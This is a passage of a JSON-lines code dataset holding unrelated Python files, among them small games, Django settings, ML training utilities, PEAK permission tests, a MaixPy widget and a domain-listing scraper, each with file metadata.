errorProcess(error)","sub_path":"incapsula/modSiteACL.py","file_name":"modSiteACL.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"103010723","text":"def brackets_cure(expr):\n difference = brackets_counter(expr,\"(\") - brackets_counter(expr,\")\") #find the difference between opening and closing brackets\n if difference > 0: #if its more opening brackets\n while difference > 0:\n expr += \")\" #we just adding closing bracket to the end of expression\n difference -= 1\n if difference < 0: #if its more closing brackets\n while difference < 0:\n expr = expr[0 : expr.rfind(\")\")-1] + expr[expr.rfind(\")\") + 1 : len(expr)] #we are removing closing bracket from the end of expression\n difference += 1\n return expr\n\n\ndef brackets_counter(expr, bracket_type):\n counter = 0 # var that stores how many\n if expr.find(bracket_type) != -1: # if we find bracket, then\n counter += 1 + brackets_counter(expr[expr.find(bracket_type)+1:len(expr)], bracket_type) # increase counter by value of one and run function recursively to find remaining brackets\n return counter # if nothing was found will return zero, otherwise it will return number of all brackets\n\n\n\nwhile(1):\n exp = input(\"input expression to calc(or just type exit to terminate program):\")\n exp = str(exp)\n exp = exp.lower().replace(\" \", \"\") # prepare exp for parsing\n exp = brackets_cure(exp) # cure bracket mismatch\n","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"523621865","text":"from random import randint\n\ndef play_cows_and_bulls():\n randomNumber = randint(1000, 9999)\n elements = [int(i) for i in str(randomNumber)]\n print(randomNumber)\n\n while True: \n guess = input(\"Guess a number: \")\n items = [int(i) for i in str(guess)]\n bulls = 0\n cows = 0 \n for i in range(4): \n if (items[i] == elements[i]):\n cows += 1\n elif items[i] in elements:\n bulls += 1\n \n if cows == 4:\n break\n\n print(\"{} cow, {} bulls\".format(cows, bulls))\n\n\nplay_cows_and_bulls()","sub_path":"18.CowsAndBulls.py","file_name":"18.CowsAndBulls.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"322045740","text":"import sys\nimport random\n\nfrom PyQt5.QtCore import QCoreApplication, QRect, QSize\nfrom PyQt5.QtGui import QIcon, QCursor, QPainter, QPen, QBrush, QColor, QPixmap, QImage, QPalette\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QWidget, QDesktopWidget, QPushButton, QHBoxLayout, QVBoxLayout, \\\n QLabel\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import QtGui, QtWidgets, QtCore\n\n\nclass Bomba:\n def __init__(self, screen: QWidget, x: int = 110, y: int=0, width: int=25, height: int=25, img: str='Slike/bomba3.png'):\n\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.img = img\n\n self.crko=False\n\n self.label = QLabel(screen)\n self.image_pixmap = QPixmap(self.img)\n self.label.setPixmap(self.image_pixmap)\n self.label.setGeometry(self.x, self.y, self.width, self.height)\n self.label.show()\n\n def moveMeDown(self):\n self.y = self.y+20\n self.label.setGeometry(self.x,self.y,self.width,self.height)\n\n def getCoords(self):\n return self.x,self.y\n\n def skloniMeMolimTe(self):\n self.label.hide()\n\n\nclass BombaFactory():\n def __init__(self, screen: QWidget):\n self.y=0\n self.width=25\n self.height=25\n self.screen=screen\n\n\n def createRandomBomba(self):\n x_values=[110,183,263,343,414]\n self.x = x_values[random.randint(0,4)]\n self.bomba=Bomba(self.screen, self.x,self.y,self.width,self.height)\n return self.bomba","sub_path":"CrazyCars/Bomba.py","file_name":"Bomba.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"552107387","text":"#!/usr/bin/env python3\n# coding=utf-8\n# b = [1, 1, 1, 2]\n\n\n# def find_uniue(arr):\n# a, b = set(arr)\n# return a if arr.count(arr) == 1 else b\n# print(find_uniue())\n\n\na = \"2 4 7 8 10\"\nb = \"1 1 1 1 2\"\n\n\ndef iq_test(numbers):\n num = list(map(lambda x: x % 2, map(int, numbers.split(\" \"))))\n a, b = set(num)\n return num.index(a) + 1 if num.count(a) == 1 else num.index(b) + 1\n\n\nprint(iq_test(a))\n","sub_path":"demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"249717926","text":"# -*- coding: utf-8 -*-\n\"\"\"Settings module for version_endpoint package.\n\nCopyright 2019 Propylon Ltd.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom django.conf import settings\n\nPACKAGE_NAMES = getattr(\n settings,\n 'VERSION_ENDPOINT_PACKAGE_NAMES',\n ['django-version-endpoint', 'Django']\n)\n\nALLOWED_PACKAGE_NAMES = getattr(\n settings,\n 'VERSION_ENDPOINT_ALLOWED_PACKAGE_NAMES',\n PACKAGE_NAMES\n)\n","sub_path":"src/version_endpoint/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"215699594","text":"# File:\n# -*- coding: utf-8 -*-\n# @Time : 4/13/2019 3:57 PM\n# @Author : Derek Hu\nimport numpy as np\nimport json\n\n\nglove_300d = \"/data2/zhe/glove/glove.42B.300d.txt\"\n\ndef to_categorical(label):\n if label == 0:\n return np.array([1, 0])\n if label == 1:\n return np.array([0, 1])\n\n\ndef load_embeddings(path, word_dict, embedding_dim):\n print(\"Loading Glove vectors...\")\n word_vectors = {}\n with open(path, encoding=\"utf-8\") as f:\n for line in f:\n values = line.split(' ')\n word = values[0]\n embedding = np.asarray(values[1:], dtype='float32')\n word_vectors[word] = embedding\n #word_embedding_matrix = np.zeros((len(word_dict), embedding_dim))\n word_embedding_matrix = np.random.normal(0, 1, (len(word_dict), embedding_dim))\n for word, i in word_dict.items():\n embedding_vector = word_vectors.get(word)\n if embedding_vector is not None:\n word_embedding_matrix[i] = embedding_vector\n return np.array(word_embedding_matrix)\n\n\ndef batch_iter_json(data, batch_size, num_epochs, shuffle=True):\n data = np.array(data)\n num_batches_per_epoch = (len(data) - 1) // batch_size + 1\n\n for epoch in range(num_epochs):\n # print(\"-------\"*10, \"epoch: \", epoch, \"-------\"*10)\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(len(data)))\n shuffled_data = data[shuffle_indices]\n else:\n shuffled_data = data\n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, len(data))\n yield shuffled_data[start_index:end_index], \\\n epoch\n","sub_path":"coherence_interface/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"455883958","text":"\"\"\"Permission tests\"\"\"\n\nfrom unittest import TestCase, makeSuite, TestSuite\nfrom peak.api import *\nfrom peak.tests import testRoot\n\n\nclass SimpleTests(TestCase):\n\n def setUp(self):\n self.context = security.Context()\n\n def checkUniversals(self):\n assert self.context.hasPermission(None, security.Anybody, None)\n assert not self.context.hasPermission(None, security.Nobody, None)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass ManageAsset(security.Permission): pass\nclass ManageBatch(security.Permission): pass\n\nclass Worker(security.Permission): pass\nclass Manager(security.Permission): pass\nclass Shipper(security.Permission): pass\nclass Receiver(security.Permission): pass\nclass Owner(security.Permission): pass\nclass SelfOrManager(security.Permission): pass\nclass ShipmentViewer(security.Permission): pass\n\nclass Facility:\n\n binding.metadata(\n viewShipments = ShipmentViewer,\n manageWorkers = Manager,\n )\n\nclass Batch:\n binding.metadata(\n edit = ManageBatch,\n delete = Owner,\n )\n\nclass Shipment(Batch):\n binding.metadata(\n receiveShipment = Receiver,\n cancelShipment = Shipper\n )\n\nclass Asset(object):\n binding.metadata(\n edit = ManageAsset\n )\n\nclass Person(object):\n binding.metadata(\n edit = SelfOrManager\n )\n\n\nclass EquipmentRules(security.Context):\n\n [security.hasPermission.when(\"perm==Worker and subject in Shipment\")]\n def checkWorkerForShipment(self, user, perm, subject):\n return self.hasPermission(user, Worker, subject.fromFacility\n ) or self.hasPermission(user, Worker, subject.toFacility\n ) or security.Denial(\n \"You need to be a worker at either the origin or destination\"\n \" facility for this shipment.\"\n )\n\n [security.hasPermission.when(\"perm==Manager and subject in Person\")]\n def checkSupervisor(self, user, perm, subject):\n return user is subject.supervisor or security.Denial(\n \"You must be a supervisor of this person.\"\n )\n\n [security.hasPermission.when(\"perm==SelfOrManager\")]\n def checkSelfOrManager(self, user, perm, subject):\n return user in (subject,subject.supervisor) or security.Denial(\n \"You must be this person or their supervisor.\"\n )\n\n [security.hasPermission.when(\"perm in [ManageAsset, ShipmentViewer]\")]\n def checkWorkerOrManager(self, user, perm, subject):\n return self.hasPermission(\n user, Worker, subject\n ) or self.hasPermission(user,Manager,subject) or security.Denial(\n \"You need to be a worker or manager at the relevant facility\"\n )\n\n [security.hasPermission.when(\"perm in [Worker, Manager]\")]\n def checkPermissionsInPlace(self, user, perm, subject):\n # check same permission, but for location\n return self.hasPermission(user,perm,subject.location)\n\n\n\n\n\n\n [security.hasPermission.when(\"perm==ManageBatch\")]\n def checkManageBatch(self, user, perm, subject):\n return (\n self.hasPermission(user,Owner,subject) or\n self.hasPermission(user,Worker,subject) or\n self.hasPermission(user,Manager,subject) or\n security.Denial(\n \"You must be the batch's owner, or a worker or manager at\"\n \" the relevant facility.\"\n )\n )\n\n\n [security.hasPermission.when(\"perm==Shipper and subject in Shipment\")]\n def checkShipper(self, user, perm, subject):\n return self.hasPermission(user, Worker, subject.fromFacility)\n\n [security.hasPermission.when(\"perm==Receiver and subject in Shipment\")]\n def checkReceiver(self, user, perm, subject):\n return self.hasPermission(user, Worker, subject.toFacility)\n\n [security.hasPermission.when(\"perm==Worker and subject in Facility\")]\n def checkWorkerForFacility(self, user, perm, subject):\n return user.facility is subject or security.Denial(\n \"You must be a worker at the relevant facility.\"\n )\n\n [security.hasPermission.when(\"perm==Manager and subject in Facility\")]\n def checkManagerForFacility(self, user, perm, subject):\n return user in subject.managers or security.Denial(\n \"You must be a manager at the relevant facility\"\n )\n\n [security.hasPermission.when(\"perm==Owner and subject in Batch\")]\n def checkBatchOwner(self, user, perm, subject):\n return user is subject.owner or security.Denial(\n \"You must be the batch's owner\"\n )\n\n\n\nNewYork = Facility()\nNewYork.name = 'New York'\nMrSmythe = Person()\nMickey = Person()\n\nMrSmythe.name = 'Smythe'\nMrSmythe.facility = NewYork\nMrSmythe.supervisor = None\n\nMickey.name = 'Mickey D'\nMickey.facility = NewYork\nMickey.supervisor = MrSmythe\n\nParis = Facility()\nParis.name = 'Paris'\nJeanPierre = Person()\nBobChien = Person()\n\nJeanPierre.name = 'J.P.'\nJeanPierre.facility = Paris\nJeanPierre.supervisor = None\n\nBobChien.name = 'Bob le Chien'\nBobChien.facility = Paris\nBobChien.supervisor = JeanPierre\n\nNewYork.managers = MrSmythe,\nParis.managers = JeanPierre,\n\n\n\n\n\n\n\n\n\n\n\n\n\nBatch123 = Batch()\nBatch123.name = 'Batch 123'\nBatch123.location = NewYork\nBatch123.owner = Mickey\n\nMegaMachine = Asset()\nMegaMachine.name = 'Mega Machine'\nMegaMachine.location = Batch123\n\nMegaDrive = Asset()\nMegaDrive.name = 'Mega Drive'\nMegaDrive.location = MegaMachine\n\nShipment16 = Shipment()\nShipment16.name = 'Shipment 16'\nShipment16.location = Paris\nShipment16.fromFacility = Paris\nShipment16.toFacility = NewYork\nShipment16.owner = BobChien\n\nThingy = Asset()\nThingy.name = 'Thingy'\nThingy.location = Shipment16\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nscenarios = [\n\n (NewYork, 'viewShipments', [MrSmythe,Mickey]),\n (NewYork, 'manageWorkers', [MrSmythe]),\n (Paris, 'viewShipments', [JeanPierre,BobChien]),\n (Paris, 'manageWorkers', [JeanPierre]),\n\n (MrSmythe,'edit',[MrSmythe]),\n (Mickey,'edit',[Mickey,MrSmythe]),\n (JeanPierre,'edit',[JeanPierre]),\n (BobChien,'edit',[BobChien,JeanPierre]),\n\n (Shipment16,'cancelShipment',[JeanPierre,BobChien]),\n (Shipment16,'receiveShipment',[MrSmythe,Mickey]),\n (Shipment16,'edit',[MrSmythe, Mickey, JeanPierre, BobChien]),\n (Shipment16,'delete',[BobChien]),\n (Shipment16,'undefined',[]),\n\n (Thingy, 'edit', [MrSmythe, Mickey, JeanPierre, BobChien]),\n (MegaDrive, 'edit', [MrSmythe, Mickey]),\n (MegaMachine, 'edit', [MrSmythe, Mickey]),\n\n (Batch123, 'delete', [Mickey]),\n (Batch123, 'edit', [MrSmythe, Mickey]),\n]\n\nclass ScenarioTests(TestCase):\n\n def assertAllowed(self, subject, name, users):\n context = EquipmentRules()\n perm = context.permissionFor(subject,name)\n for person in MrSmythe, Mickey, JeanPierre, BobChien:\n allowed = context.hasPermission(person,perm,subject)\n assert not allowed==(person not in users), (\n \"%s fails for %s.%s\" % (person.name, subject.name, name)\n )\n\n def checkScenarios(self):\n for s in scenarios:\n self.assertAllowed(*s)\n\nTestClasses = (\n SimpleTests, ScenarioTests\n)\n\n\ndef test_suite():\n return TestSuite([makeSuite(t,'check') for t in TestClasses])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"PEAK-0.5a4dev_r2085/src/peak/security/tests/permission.py","file_name":"permission.py","file_ext":"py","file_size_in_byte":7178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"472035803","text":"import image\n\ntry:\n from ui_canvas import ui\n from touch import Touch, touch\n from core import system\nexcept ImportError:\n from ui.ui_canvas import ui\n from driver.touch import Touch, touch\n from lib.core import system\n\n\nclass Widget:\n def __init__(self, x, y, w, h):\n self.__x = x\n self.__y = y\n self.__w = w\n self.__h = h\n\n self.__border_color = None\n self.__border_thickness = 0\n self.__bg_color = None\n self.__bg_img = None\n self.__bg_img_padding_left = None\n self.__bg_img_padding_top = None\n self.__aplpha = True\n\n self.__eves = {Touch.press: None, Touch.click: None,\n Touch.idle: None, Touch.drag: None}\n self.__eargs = {Touch.press: None, Touch.click: None,\n Touch.idle: None, Touch.drag: None}\n self.__eve_enable = False\n setattr(self, \"touch_event\", self.touch_event_)\n\n # 将 widget 显示在 Canvas 上\n def draw(self):\n # fill background\n if self.__bg_color:\n ui.canvas.draw_rectangle(\n self.__x, self.__y, self.__w, self.__h, color=self.__bg_color, fill=True)\n if self.__bg_img:\n ui.canvas.draw_image(self.__bg_img, self.__x + self.__bg_img_padding_left,\n self.__y + self.__bg_img_padding_top, alpha=255)\n if self.__border_color:\n ui.canvas.draw_rectangle(self.__x, self.__y, self.__w, self.__h,\n self.__border_color, thickness=self.__border_thickness)\n\n def _point_in_widget(self, point):\n x = point[0]\n y = point[1]\n if x >= self.__x and x <= self.__x + self.__w and y >= self.__y and y <= self.__y + self.__h:\n return True\n return False\n\n def touch_event_(self, *args):\n if self._point_in_widget(touch.points[1]) and self.__eves[touch.state] != None:\n self.__eves[touch.state](self.__eargs[touch.state]) if self.__eargs[touch.state] else self.__eves[touch.state]()\n\n # eve_name: event name, string type\n def register_event(self, eve_name, func, *args):\n for e in self.__eves.keys():\n if e == eve_name:\n self.__eves[e] = func\n self.__eargs[e] = args\n if self.__eve_enable == False:\n print(self, \"register touch event\")\n touch.register_touch_event(self.touch_event, None)\n self.__eve_enable = True\n return\n\n print(\"event name error, please use follow values:\")\n for i in self.__eves.keys():\n print(i)\n\n def unregister_event(self, eve_name):\n for e in self.__eves.keys():\n if e == eve_name:\n self.__eves[e] = None\n self.__eargs[e] = None\n if self.__eve_enable and self.__eves == {Touch.press: None, Touch.click: None,\n Touch.idle: None, Touch.drag: None}:\n touch.unregister_touch_event(self.touch_event)\n self.__eve_enable = False\n return\n \n print(\"event name error, please use follow values:\")\n for i in self.__eves.keys():\n print(i)\n\n def set_bg_color(self, color):\n self.__bg_color = color\n self.draw()\n\n def set_bg_img(self, img, padding_left=None, padding_top=None):\n self.__bg_img = img\n w = self.__bg_img.width()\n h = self.__bg_img.height()\n\n # default center\n self.__bg_img_padding_left = (self.__w - w) // 2\n self.__bg_img_padding_top = (self.__h - h) // 2\n\n # custom pos\n if padding_left:\n self.__bg_img_padding_left = padding_left\n if padding_top:\n self.__bg_img_padding_top = padding_top\n self.draw()\n\n # set position and size\n def set_pos_size(self, x, y, w, h):\n self.clear()\n self.__w = w\n self.__h = h\n self.__x = x\n self.__y = y\n if self.__bg_img:\n self.set_bg_img(self.__bg_img.resize(w, h))\n self.draw()\n\n def set_border(self, color, thickness):\n self.__border_color = color\n self.__border_thickness = thickness\n self.draw()\n\n # clear background\n def clear(self):\n ui.clear(self.__x - self.__border_thickness, self.__y - self.__border_thickness,\n self.__w + self.__border_thickness, self.__h + self.__border_thickness)\n\n\nif __name__ == '__main__':\n import time\n import os\n try:\n from touch import Touch\n from core import system\n except:\n from driver.touch import Touch\n from lib.core import system\n\n ui.set_bg_color((255, 255, 0))\n\n img = image.Image(os.getcwd() + \"/res/icons/app_camera.bmp\")\n # create widget\n wig = Widget(0, 0, 100, 100)\n wig.set_pos_size(0, 0, 80, 80)\n wig.set_bg_img(img)\n wig.set_border((255, 255, 255), 1)\n\n def on_press(wig):\n wig=wig[0]\n wig.set_bg_color((0, 0, 255))\n wig.set_pos_size(0, 0, 100, 100)\n print(\"wig press\")\n\n wig.register_event(Touch.click, on_press, wig)\n # wig.unregister_event(Touch.press)\n system.event(0, ui.display)\n clock = time.clock()\n pos_x = 0\n while True:\n clock.tick()\n pos_x+=1\n wig.set_pos_size(pos_x, 10, 100, 100)\n system.parallel_cycle()\n # print(clock.fps())\n","sub_path":"ui/ui_widget.py","file_name":"ui_widget.py","file_ext":"py","file_size_in_byte":5456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"213694899","text":"# https://www.expireddomains.net/\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nimport time\nimport csv\n\n\n\nmain_url = 'https://www.expireddomains.net'\n# GET request to fetch raw html content\nmain_response = requests.get(main_url)\n# parse html content\nmain_data = BeautifulSoup(main_response.content,\"lxml\")\n\nua_dmn_aux1 = ''\n# filter link for domains UA\nfor dmn_link in main_data.find_all('a'):\n\tif 'ua' in dmn_link.text:\n\t\tua_dmn_aux1 = dmn_link.get('href')\nua_dmn_url = ua_dmn_aux1\nprint(ua_dmn_url)\n\n# combine link to ua domain page\nua_dmn_url = main_url.strip() + ua_dmn_url.strip()\nprint(ua_dmn_url)\n\ntime.sleep(2)\n# GET request to fetch raw html content\nuadmn_response = requests.get(ua_dmn_url)\n# parse html content\nuadmn_data = BeautifulSoup(uadmn_response.content,\"lxml\")\n# find url table\n\n# uadmn_table = uadmn_data.find('table', attrs = {'class': 'base1'})\nuadmn_table = uadmn_data.select_one('div.listing > table.base1')\nuadmn_table_data = uadmn_table.find_all('tr')\n\n# open csv file\nf = open('ua_domains_list', 'w', newline='')\n# process data from html\nt_rec = []\nre_ptn = r'[\\'\\s]+'\nfor tr in uadmn_table_data:\n\t#append list\n\ttd_row = []\n\tfor td in tr:\n\t\ttd_elm = re.sub(re_ptn, '', td.string)\n\t\t# add record if not empty\n\t\tif td_elm != '':\n\t\t\ttd_row.append(td_elm)\n\t# write to csv file\n\tcsvwriter = csv.writer(f, delimiter=';')\n\tcsvwriter.writerow(td_row)\t\t\n\tprint(td_row)\n\tt_rec.append(td_row)\n# close csv file\nf.close()\t\n\n\n\n\n\n\n\n","sub_path":"HT_9/domains_scrape_ban.py","file_name":"domains_scrape_ban.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"595208874","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport sorl.thumbnail.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Story',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('title', models.CharField(max_length=255, db_index=True)),\n ('blurb', models.TextField(null=True, blank=True)),\n ('cover_image', sorl.thumbnail.fields.ImageField(null=True, upload_to='')),\n ('published', models.BooleanField(default=False)),\n ('date', models.DateField(auto_now_add=True, auto_now=True)),\n ('slug', models.SlugField(null=True, unique=True, max_length=255, blank=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='StoryItem',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('title', models.CharField(max_length=255)),\n ('image', sorl.thumbnail.fields.ImageField(null=True, upload_to='')),\n ('text', models.TextField(null=True, blank=True)),\n ('item_type', models.CharField(default='text', max_length=25, choices=[('Image', 'image'), ('Text', 'text')])),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='story',\n name='parts',\n field=models.ManyToManyField(null=True, to='core.StoryItem', blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"core/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"545742515","text":"import copy\nimport torch\ntorch.manual_seed(1)\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.optim.lr_scheduler import StepLR\nfrom sklearn.metrics import roc_curve\nfrom datetime import datetime\n\nimport numpy as np\nnp.random.seed(1)\n\nimport time\nimport utils\nimport models\nimport argparse\nimport data_loader\nimport pandas as pd\nimport ujson as json\n\nfrom sklearn import metrics\n\n#from ipdb import set_trace\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--epochs', type=int, default=1000)\nparser.add_argument('--batch_size', type=int, default=32)\nparser.add_argument('--model', type=str)\nparser.add_argument('--hid_size', type=int)\nparser.add_argument('--impute_weight', type=float)\n#parser.add_argument('--label_weight', type=float)\nargs = parser.parse_args()\n\n\ndef train(model):\n optimizer = optim.Adam(model.parameters(), lr=1e-3)\n\n data_iter = data_loader.get_train(batch_size=args.batch_size)\n test_iter = data_loader.get_test(batch_size=args.batch_size)\n\n auroc_auprc = []\n\n for epoch in range(args.epochs):\n model.train()\n\n run_loss = 0.0\n\n for idx, data in enumerate(data_iter):\n data = utils.to_var(data)\n ret = model.run_on_batch(data, optimizer, epoch)\n\n run_loss += ret['loss'].item()\n\n print(\"\\r Progress epoch {}, {:.2f}%, average loss {}\".format(epoch, (idx + 1) * 100.0 / len(data_iter), run_loss / (idx + 1.0))),\n\n auroc_auprc.append(evaluate(model, test_iter))\n\n\n\ndef evaluate(model, val_iter):\n model.eval()\n\n #labels = []\n #preds = []\n\n evals = []\n imputations = []\n\n save_impute = []\n #save_label = []\n\n for idx, data in enumerate(val_iter):\n data = utils.to_var(data)\n ret = model.run_on_batch(data, None)\n\n # save the imputation results which is used to test the improvement of traditional methods with imputed values\n save_impute.append(ret['imputations'].data.cpu().numpy())\n #save_label.append(ret['labels'].data.cpu().numpy())\n\n #pred = ret['predictions'].data.cpu().numpy()\n #label = ret['labels'].data.cpu().numpy()\n is_train = ret['is_train'].data.cpu().numpy()\n\n eval_masks = ret['eval_masks'].data.cpu().numpy()\n eval_ = ret['evals'].data.cpu().numpy()\n imputation = ret['imputations'].data.cpu().numpy()\n\n evals += eval_[np.where(eval_masks == 1)].tolist()\n imputations += imputation[np.where(eval_masks == 1)].tolist()\n\n # collect test label & prediction\n #pred = pred[np.where(is_train == 0)]\n #label = label[np.where(is_train == 0)]\n\n #labels += label.tolist()\n #preds += pred.tolist()\n\n #print(\"The evaluated values --------------------------\", eval_)\n #print(\"The imputed values --------------------------\", imputations)\n #labels = np.asarray(labels).astype('float32')\n #preds = np.asarray(preds)\n\n # compute auroc and auprc\n #print(clf.score(values, labels)\n #fpr, tpr, thresholds = roc_curve(preds,labels)\n #plt.plot(fpr, label = 'fpr')\n #plt.plot(tpr, label = 'tpr')\n #plt.legend(fontsize=16)\n #auroc = metrics.roc_auc_score(labels, preds)\n #auprc = metrics.average_precision_score(labels, preds)\n\n\n #print('AUROC {}'.format(auroc), 'AUPRC {}'.format(auprc))\n # Compute average precision (AP) from prediction scores This score corresponds to the area under the precision-recall curve.\n # The worst AUPRC is 0, and the best AUPRC is 1.0. This is in contrast to AUROC, where the lowest value is 0.5.\n #print('AUPRC {}'.format(metrics.average_precision_score(labels, preds)))\n\n #cutoff = 0.5 #np.mean(preds)\n #rfc_pred = np.zeros_like(preds)\n #rfc_pred[preds > cutoff] = 1\n\n\n evals = np.asarray(evals)\n imputations = np.asarray(imputations)\n\n print('MAE', np.abs(evals - imputations).mean() )\n\n print('MRE', np.abs(evals - imputations).sum() / np.abs(evals).sum())\n\n save_impute = np.concatenate(save_impute, axis=0)\n #save_label = np.concatenate(save_label, axis=0)\n\n np.save('./result/{}_data'.format(args.model), save_impute)\n #np.save('./result/{}_label'.format(args.model), save_label)\n\n #auroc_auprc = [auroc, auprc]\n #return auroc_auprc\n\n\ndef run():\n model = getattr(models, args.model).Model(args.hid_size, args.impute_weight)\n total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print('Total params is {}'.format(total_params))\n\n if torch.cuda.is_available():\n model = model.cuda()\n\n train(model)\n\n\nif __name__ == '__main__':\n run()\n dateTimeObj = datetime.now()\n print(dateTimeObj)\n\n","sub_path":"Air-Quality/SampleData/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"605370876","text":"from transactionRecord import transactionRecord\nfrom trainHistory import trainRecord\nfrom featureCustomer import *\nfrom featureOffer import *\nfrom featureCustomerOffer import *\n\ntrainF = file(\"trainHistory.csv\", \"r\")\n\nline = trainF.readline()\nline = trainF.readline()\nallCustToOfferTrain = {}\nwhile(line):\n allCustToOfferTrain[line.split(\",\")[0]] = trainRecord(line, train=True)\n line = trainF.readline()\ntrainF.close()\n\ntestF = file(\"testHistory.csv\", \"r\")\n\nline = testF.readline()\nline = testF.readline()\nallCustToOfferTest = {}\nwhile(line):\n allCustToOfferTest[line.split(\",\")[0]] = trainRecord(line, train=False)\n line = testF.readline()\ntestF.close()\n\n\n\n# summarize all records for the same customer\n# hold transactionRecord objects in self.transactions\n# hold functions for feature construction\nclass oneCustomerRecord: \n def __init__(self, line, train=True):\n self.transactions = []\n self.colnames = []\n self.transactions.append(transactionRecord(line))\n self.customerID = self.transactions[0].customerID\n \n if(train):\n allCustToOffer = allCustToOfferTrain\n else:\n allCustToOffer = allCustToOfferTest\n # link customer to offer\n self.offer = allCustToOffer[self.customerID].offer\n # link customer to repeater (t/f)\n # comment out for test data set\n if(train):\n rep = allCustToOffer[self.customerID].repeater ###########################\n if(rep == \"t\"):\n self.repeater = 1\n else:\n self.repeater = 0\n\n def addLine(self, line):\n self.transactions.append(transactionRecord(line))\n \n # function construct a list of features for a customer\n # return the list of features for the customer\n def getCustomerSummary(self, train=True):\n self.resultVector = []\n # construct feature X matrix\n getFeaturesCust(self.resultVector, self, self.colnames)\n getFeaturesOffer(self.resultVector, self.offer, self.colnames)\n getFeaturesCustOffer(self.resultVector, self.offer, self, self.colnames)\n # add in y column\n # only for training data set\n if(train):\n self.resultVector.append(self.repeater)\n self.colnames.append(\"y\")\n\n for i in range(len(self.resultVector)):\n self.resultVector[i] = str(self.resultVector[i])\n return self.resultVector\n\n\n","sub_path":"oneCustomerRecord.py","file_name":"oneCustomerRecord.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"526074999","text":"\nimport math\n\nfrom tqdm import trange, tqdm\nimport torch\n\ndef _get_log_pz_qz_prodzi_qzCx(latent_sample, latent_dist, n_data, is_mss=True):\n batch_size, hidden_dim = latent_sample.shape\n\n # calculate log q(z|x)\n log_q_zCx = log_density_gaussian(latent_sample, *latent_dist).sum(dim=1)\n\n # calculate log p(z)\n # mean and log var is 0\n zeros = torch.zeros_like(latent_sample)\n log_pz = log_density_gaussian(latent_sample, zeros, zeros).sum(1)\n\n mat_log_qz = matrix_log_density_gaussian(latent_sample, *latent_dist)\n\n if is_mss:\n # use stratification\n log_iw_mat = log_importance_weight_matrix(batch_size, n_data).to(latent_sample.device)\n mat_log_qz = mat_log_qz + log_iw_mat.view(batch_size, batch_size, 1)\n\n log_qz = torch.logsumexp(mat_log_qz.sum(2), dim=1, keepdim=False)\n log_prod_qzi = torch.logsumexp(mat_log_qz, dim=1, keepdim=False).sum(1)\n\n return log_pz, log_qz, log_prod_qzi, log_q_zCx\n\ndef _get_log_pz_qz_prodzi_qzCx_fip(latent_sample, z0sample, latent_dist, n_data, is_mss=True):\n batch_size, hidden_dim = latent_sample.shape\n\n # calculate log q(z|x)\n log_q_zCx = log_density_gaussian(latent_sample, *latent_dist).sum(dim=1)\n\n # calculate log p(z)\n # mean and log var is 